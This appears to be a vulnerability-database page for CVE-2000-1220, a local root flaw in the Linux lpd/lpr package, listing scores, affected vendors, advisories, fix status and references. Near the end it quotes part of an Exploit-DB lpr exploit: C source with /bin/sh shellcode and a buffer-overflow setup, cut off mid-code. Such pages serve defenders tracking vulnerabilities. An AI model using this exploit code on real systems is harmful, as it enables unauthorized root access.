CVE-2000-1220
published 2000-01-08CVE-2000-1220: The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to execute…
PriorityP345critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
14.22%
96.2th percentile
The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to execute with arbitrary command line arguments, as demonstrated using the -C option to specify a configuration file.
Affected
34 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | lpr | < lpr 1:0.48-1 (bookworm) | lpr 1:0.48-1 (bookworm) |
| redhat | linux | — | — |
| redhat | linux | — | — |
| redhat | linux | — | — |
| redhat | linux | — | — |
| redhat | linux | — | — |
| redhat | linux | — | — |
| redhat | linux | — | — |
| redhat | linux | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0CRITICAL
vendor_redhat10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7v4g-j9jw-cxjp: The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to
ghsa_unreviewed·2022-05-03
CVE-2000-1220 [HIGH] GHSA-7v4g-j9jw-cxjp: The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to
The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to execute with arbitrary command line arguments, as demonstrated using the -C option to specify a configuration file.
GHSA
GHSA-4xc7-h5vr-gqmj: lpd daemon (in
ghsa_unreviewed·2022-04-30·CVSS 10.0
CVE-2001-1583 [CRITICAL] CWE-78 GHSA-4xc7-h5vr-gqmj: lpd daemon (in
lpd daemon (in.lpd) in Solaris 8 and earlier allows remote attackers to execute arbitrary commands via a job request with a crafted control file that is not properly handled when lpd invokes a mail program. NOTE: this might be the same vulnerability as CVE-2000-1220.
OSV
CVE-2000-1220: The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to
osv·2000-01-08·CVSS 10.0
CVE-2000-1220 [CRITICAL] CVE-2000-1220: The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to
The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to execute with arbitrary command line arguments, as demonstrated using the -C option to specify a configuration file.
Red Hat
security flaw
vendor_redhat·2000-01-08·CVSS 10.0
CVE-2000-1220 [CRITICAL] security flaw
security flaw
The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to execute with arbitrary command line arguments, as demonstrated using the -C option to specify a configuration file.
Debian
CVE-2000-1220: lpr - The line printer daemon (lpd) in the lpr package in multiple Linux operating sys...
vendor_debian·2000·CVSS 10.0
CVE-2000-1220 [CRITICAL] CVE-2000-1220: lpr - The line printer daemon (lpd) in the lpr package in multiple Linux operating sys...
The line printer daemon (lpd) in the lpr package in multiple Linux operating systems allows local users to gain root privileges by causing sendmail to execute with arbitrary command line arguments, as demonstrated using the -C option to specify a configuration file.
Scope: local
bookworm: resolved (fixed in 1:0.48-1)
bullseye: resolved (fixed in 1:0.48-1)
forky: resolved (fixed in 1:0.48-1)
sid: resolved (fixed in 1:0.48-1)
trixie: resolved (fixed in 1:0.48-1)
No detection rules found.
Exploit-DB
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Local Buffer Overflow (2)
exploitdb·2000-05-26
CVE-2000-0389 Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Local Buffer Overflow (2)
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Local Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/1220/info
Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a
Exploit-DB
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Remote Buffer Overflow (1)
exploitdb·2000-05-16
CVE-2000-0389 Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Remote Buffer Overflow (1)
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Remote Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/1220/info
Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a
Exploit-DB
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Remote Buffer Overflow (3)
exploitdb·2000-04-08
CVE-2000-0389 Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Remote Buffer Overflow (3)
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Remote Buffer Overflow (3)
---
// source: https://www.securityfocus.com/bid/1220/info
Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a
Exploit-DB
BSD / Linux - 'lpr' Local Privilege Escalation
exploitdb·1996-10-25
CVE-2000-1220 BSD / Linux - 'lpr' Local Privilege Escalation
BSD / Linux - 'lpr' Local Privilege Escalation
---
-------------------------------------- linux_lpr_exploit.c ----------
#include
#include
#include
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i BUFSIZ-2) /* !! */
{ /* !! */
printf("No, thanks..
ftp://patches.sgi.com/support/free/security/advisories/20021104-01-Phttp://seclists.org/lists/bugtraq/2000/Jan/0116.htmlhttp://www.atstake.com/research/advisories/2000/lpd_advisory.txthttp://www.debian.org/security/2000/20000109http://www.kb.cert.org/vuls/id/39001http://www.l0pht.com/advisories/lpd_advisoryhttp://www.redhat.com/support/errata/RHSA-2000-002.htmlhttp://www.securityfocus.com/bid/927https://exchange.xforce.ibmcloud.com/vulnerabilities/3841ftp://patches.sgi.com/support/free/security/advisories/20021104-01-Phttp://seclists.org/lists/bugtraq/2000/Jan/0116.htmlhttp://www.atstake.com/research/advisories/2000/lpd_advisory.txthttp://www.debian.org/security/2000/20000109http://www.kb.cert.org/vuls/id/39001http://www.l0pht.com/advisories/lpd_advisoryhttp://www.redhat.com/support/errata/RHSA-2000-002.htmlhttp://www.securityfocus.com/bid/927https://exchange.xforce.ibmcloud.com/vulnerabilities/3841
2000-01-08
Published